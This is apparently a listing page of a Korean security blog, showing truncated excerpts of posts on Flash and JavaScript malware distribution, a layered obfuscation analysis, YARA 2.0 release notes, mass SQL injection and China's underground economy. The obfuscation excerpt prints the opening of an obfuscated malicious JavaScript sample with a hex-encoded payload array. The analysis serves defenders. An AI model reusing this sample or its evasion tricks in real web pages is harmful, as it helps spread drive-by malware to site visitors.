Shockwave Flash Player 파일의 Magic Signature은 SWFFWS이다. 하지만 이는 SWF 파일은 코드를 쉽게 볼 수 있기 때문에 SWF 파일의 컨텐츠 보호가 필요하게 되었다. 그래서 압축기술, 난독화 기술, 암호기술 등 생겼고, CWS라는 Magic Signature는 SWF 파일의 압축에 의해 생겨난 Signature이다. SWF의 Action Script 기능을 이용하여 악성코드 유포지로 활용하기도 하며, 때로는 악성 소프트웨어 위치를 SWF에 저장하기도 한다. 또한 Adobe Flash Player의 취약성을 SWF 파일에 담아 악성 소프트웨어 유포를 위한 취약점을 유발시키는 코드가 포함되기도 한다. 다음 도구는 CWS Magic Signature를 decompressor..
1. 개요 개발자들의 암묵적인 사항으로 자바스크립트 파일은 *.js확장자를 가지도록 하며, 실제로 운영체제도 *.js는 자바스크립트 파일로 인식하고 있다. 하지만 자바스크립트 엔진을 가지고 자바스크립트 언어 및 파일을 인지하고 인식하는 브라우저는 어떨까? 자바스크립트 언어의 특징 중 하나는 파일 확장자와 무관하게 동작한다는 점이다. 그림 1. 악성코드 유포지가 삽입된 경유지 그림 1에서 보는 것과 같이 script 태그로 자바스크립트를 선언한 후 ***/top.jpg를 리디렉션 하고 있다. 확장자만 보았을 땐 jpg 그림파일이어야 하지만 script로 인식하여 파일 안의 자바스크립트 코드를 실행하게 된다. 이러한 이유는 script 태그를 사용하면 자바스크립트 엔진이 운영되고 엔진은 확장자 확인 없이 파..
1. 개요 이 난독화는 몇몇 난독화들이 중복적으로 사용되어 있다. 1.1. 원본 소스코드 asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x..
로고가 바뀌었네요? 위 로고는 기존의 로고에 제가 맞춘것 아래는 새로운 로고 입니다. 2.0.0 (26/12/2013) 빠른 매칭 알고리즘 (Faster matching algorithm)커맨드 라인 스캐너가 이젠 다중 스레드로 동작 (Command-line scanner is now multi-threaded)컴파일 된 규칙을 파일에 저장하고 로드할 수 있음 (Compiled rules can be saved to and loaded from a file)무제한 점프에 대한 지원 (Added support for unbounded jumps)새로운 libyara API (New libyara API) unbounded jumps가 뭐죠???새로운 API가 기존에 구축한 1.x대와 얼마나 달라지는가에 따..
브라우저 내부에는 자바스크립트 엔진이라는 특수한 소프트웨어을 포함하고 있으며 이 엔진은 자바스크립트 코드를 인터프리터 형태로 실행할 수 있도록 해준다. 그래서 일반적인 언어는 컴파일러가 필요하지만, 자바스크립트 언어의 경우 브라우저가 직접 파싱하고 직접 해석하게 된다. 페이지가 로딩 후 자바스크립트 코드는 웹 브라우저와 함께 작동하기 때문에, 실시간으로 사용자의 이벤트에 응답하고, 페이지를 수정하기도 한다. 사용자와 대화하는 자바스크립트 언어의 특징으로 인해 좀더 빠르게 사용자와 소통하기 위해 자바스크립트 언어는 클라이언트에 임시 저장을 하게 된다. 그래서 클라이언트용 언어라고 알려져 있으며, 사용자는 쉽게 소스코드를 볼 수 있다. 자바스크립트 코드는 웹 페이지에 소스코드를 그대로 사용하지 않아도 되며,..
1. Mass SQLi의 흔적 SQL Injection 기법 중 Mass SQL Injection기법이 있다. 이는 수많은 사이트에 무작위로 SQL Injection하는 기법으로 무작위 대입 기법과 비슷하다고 가정 할 경우 수작업 보단 자동화된 도구에 의존한다고 볼 수 있다. [칼럼] 웹서비스 보안의 불편한 진실,2010.08.05[KISA] [TR2008007] 자동화된 SQL Injection 공격을 통한 악성코드 대량 삽입 수법 분석 - PDF 현재 개인적으로 연구 겸 번역 작업을 하고 있는 "Investingating China's Online Underground Economy"의 3.3.2. 인터넷 리소스와 서비스 악용 가치 사슬의 역할 과 속어 파트의 두 번째 단락에서 다음과 같이 말하고 있..
1. hanging on 소프트웨어 블랙햇에 의해 소량의 페이를 받고 자신의 컴퓨터의 사용 권한을 제공하는 소프트웨어. 컴퓨터의 주인이 컴퓨터를 사용하고 있지 않을 때 블랙햇에 의해 제어권을 제공하기에 제공자 입장에선 불편함 없이 소량의 페이를 챙길 수 있지만 블랙햇은 이 컴퓨터를 이용하여 다양한 공격을 진행하고 자신의 정체를 숨길 수 있다. 말이 hanging on 소프트웨어지 간단한 예로 "팀뷰", "오픈 vpn"과 같은 컴퓨터 제어 소프트웨어라고 할 수 있다. "hanging on" 소프트웨어를 이용하는 사용자들과 블랙햇과의 신뢰의 지속성을 위해 해당 소프트웨어를 사용하는 PC를 이용하여 직접적인 공격을 수행하지 않고, 스팸 메일 서비스, DDoS 공격의 시작, 부정 클릭 수행, 부정 투표를 통한 ..
이 자료들은 트랜드마이크로 연구소에서 공개한 시리즈이며, 원본은 IGCC에서 2012년 7월 31일에 공개한 보고서에 의거한다. IGCC - University of California Institute on Global Conflict and Cooperation Web Page - New IGCC Working Paper on Cybercrime Released Full Paper PDF - Investingating China's Online Underground Economy TrendLabs - The Chinese Undergournd Series Part 1: Introduction Part 2: The Four Value Chains Part 3: Virtual Assets Theft Pa..
